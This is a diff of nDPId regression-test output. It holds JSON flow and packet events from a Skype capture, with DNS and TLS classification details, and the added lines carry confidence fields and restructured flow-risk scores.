-00759{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}}
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKxdsAAEARMVTAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKPqUAAEARuIrAqAEiwKgBAd\/IADUANro4UU4BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAABwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1431969642400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1431969642400,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA15TkAhAy4SPGBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAArBADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"}
-00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}}
+00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01393{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431969642969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969642969,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6a7MAAEARi4zAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431969643037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969643037,"pkt":"0NQSxnP1PBXCt3IOCABFAABEXycAAEARmA7AqAEiwKgBAcqnADUAMDQMD6ABAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjuUAAEARaFTAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
